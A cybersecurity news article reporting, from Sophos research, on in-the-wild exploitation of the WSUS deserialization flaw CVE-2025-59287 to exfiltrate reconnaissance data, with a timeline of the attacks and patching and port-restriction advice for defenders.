Windows Server Update Services (WSUS) vulnerability is actively exploited in the wild. Criminals are using this vulnerability to steal sensitive data from organizations in various industries.
The vulnerability, tracked as CVE-2025-59287, was patched by Microsoft on October 14, 2025, but attackers quickly began abusing it after proof-of-concept code became publicly available on GitHub.
Sophos telemetry indicates that exploitation began on October 24, 2025, just hours after technical analysis and exploit code were released online.
The threat actors targeted internet-facing WSUS servers in universities, technology companies, manufacturing firms, and healthcare organizations, primarily based in the United States.
While Sophos has confirmed six incidents so far, security experts believe the actual number of compromised organizations is significantly higher.
How the Attacks Unfold
The exploitation leverages a critical deserialization bug in WSUS that allows unauthenticated remote code execution. When attackers target vulnerable servers, they inject Base64-encoded PowerShell commands through nested command processes running under IIS worker privileges.
The malicious script executes silently on compromised systems, gathering valuable intelligence about targeted organizations.
The harvested data includes external IP addresses and ports of vulnerable hosts, enumerated lists of Active Directory domain users, and detailed network interface configurations. This information is then exfiltrated to webhook.site URLs controlled by the attackers.
Sophos researchers discovered four unique webhook.site URLs associated with the attacks, with three linked to the platform’s free service tier.
By analyzing the request logs on two publicly accessible URLs, researchers observed that exploitation began at 02:53 UTC on October 24 and reached the maximum threshold of 100 requests by 11:32 UTC the same day.
The rapid exploitation of this vulnerability demonstrates how quickly threat actors move to weaponize newly disclosed flaws.
The indiscriminate nature of the attacks suggests cybercriminals are scanning for exposed WSUS servers on the internet and exploiting them opportunistically rather than targeting specific organizations.
According to Rafe Pilling, Director of Threat Intelligence at Sophos, “This activity shows that threat actors moved quickly to exploit this critical vulnerability in WSUS to collect valuable data from vulnerable organizations.”
The stolen data could be used for reconnaissance, follow-up attacks, or sold to other malicious actors on underground marketplaces. Organizations running WSUS services should immediately apply Microsoft’s security patches and conduct thorough reviews of their network configurations.
Additionally, companies should identify any WSUS server interfaces exposed to the internet and restrict access to WSUS ports 8530 and 8531 only to systems that genuinely require connectivity.
Security teams should review logs for signs of exploitation and implement network segmentation to prevent lateral movement if compromises are discovered.
Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.
